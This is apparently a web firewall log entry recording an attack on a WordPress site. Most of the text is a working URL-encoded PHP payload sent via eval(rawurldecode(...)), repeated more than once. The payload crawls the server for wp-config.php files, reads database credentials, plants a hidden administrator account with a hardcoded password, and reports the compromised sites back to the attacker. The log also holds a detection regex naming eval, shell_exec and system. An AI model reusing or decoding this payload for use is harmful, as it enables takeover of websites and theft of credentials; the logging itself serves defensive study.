0%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:13:10","213.209.159.254","POST","\/wp-includes\/compat-utf8.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> fpVGge:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/compat-utf8.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-fetch-dest:document\naccept:*\/*\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Google Chrome\";v=\"101\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\ncontent-length:12663\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-encoding:gzip,deflate\nsec-fetch-site:none\nsec-fetch-user:?1\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36\n\nfpVGge=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%2